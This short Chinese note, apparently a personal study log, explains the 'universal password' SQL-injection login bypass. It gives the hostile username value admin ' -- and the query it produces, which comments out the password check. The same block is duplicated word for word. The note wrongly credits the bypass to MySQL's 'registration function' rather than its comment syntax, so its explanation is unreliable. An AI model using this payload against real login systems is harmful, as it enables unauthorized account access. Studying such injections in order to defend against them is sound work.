萬(wàn)能密碼
username = admin ' --
password =''
后臺(tái)接收數(shù)據(jù)
SELECT * FROM user WHERE username = 'admin ' -- ' and password ="123456"
然后利用了 mysql的注冊(cè)功能
造成
只執(zhí)行了
> SELECT * FROM user where username = "admin"
username = admin ' --
password =''
后臺(tái)接收數(shù)據(jù)
SELECT * FROM user WHERE username = 'admin ' -- ' and password ="123456"
然后利用了 mysql的注冊(cè)功能
造成
只執(zhí)行了
> SELECT * FROM user where username = "admin"